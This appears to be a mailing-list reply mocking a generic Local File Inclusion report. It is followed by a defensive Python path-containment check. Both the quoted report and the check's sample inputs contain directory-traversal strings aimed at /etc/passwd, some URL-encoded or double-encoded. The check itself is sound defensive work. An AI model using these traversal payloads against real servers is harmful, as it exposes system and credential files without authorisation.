Oh my aren't you the clever one! Your closing sentence:
> This information may then be used to advance an attack.

By all means, please show how you do that.

Srikar V <[email protected]> wrote:

> An attacker can use Local File Inclusion (LFI) to trick the web application
> into exposing or running files on the web server. An LFI attack may lead to
> information disclosure, remote code execution, or even Cross-site Scripting
> (XSS). Typically, LFI occurs when an application uses the path to a file as
> input. If the application treats this input as trusted, a local file may be
> used in the include statement.
>
>
> Directory Traversal
> Even without the ability to upload and execute code, a Local File Inclusion
> vulnerability can be dangerous. An attacker can still perform a Directory
> Traversal / Path Traversal attack using an LFI vulnerability as follows.
>
> http://example.com/?file=../../../../etc/passwd
> In the above example, an attacker can get the contents of the /etc/passwd
> file that contains a list of users on the server. Similarly, an attacker
> may leverage the Directory Traversal vulnerability to access log files (for
> example, Apache access.log or error.log), source code, and other sensitive
> information. This information may then be used to advance an attack.
>
> VULNERABLE ENDPOINTS:
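
A containment check for the traversal pattern the quoted report describes, as an added example that is not part of the original thread or of any server discussed in it. `DOC_ROOT`, `safe_resolve` and the sample inputs are assumptions constructed for illustration, in the shapes of the paths the report quotes.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/var/www/htdocs"  # assumed document root, not taken from the thread


def safe_resolve(user_path, root=DOC_ROOT, max_rounds=3):
    """Return the normalized path under root, or None if the input escapes it."""
    decoded = user_path
    # Decode until stable so double-encoded separators (%252f) are seen as "/".
    for _ in range(max_rounds):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    else:
        return None  # still changing after max_rounds: refuse to guess
    if "\x00" in decoded:
        return None  # NUL can truncate the name in lower layers
    # Lexical normalization only; a real server should also resolve symlinks
    # (os.path.realpath) before the containment test.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


SAMPLES = [  # constructed inputs
    "pub/README",                                # ordinary file request
    "node_modules/../../../../../etc/passwd",    # plain dot-dot segments
    "static/../../../a/../../../../etc/passwd",  # dot-dot with a decoy segment
    "..%2f..%2f..%2f..%2fetc/passwd",            # encoded separators
    "..%252f..%252f..%252f..%252fetc/passwd",    # double-encoded separators
    "..%%2f..%%2fetc/passwd",                    # literal "%%2f": segments are "..%"
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:48} -> {safe_resolve(s)}")
```

A `None` result means the request should be refused before any file is opened; whether a given server is affected depends on what it actually returns for such a request, not on the URL being accepted.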
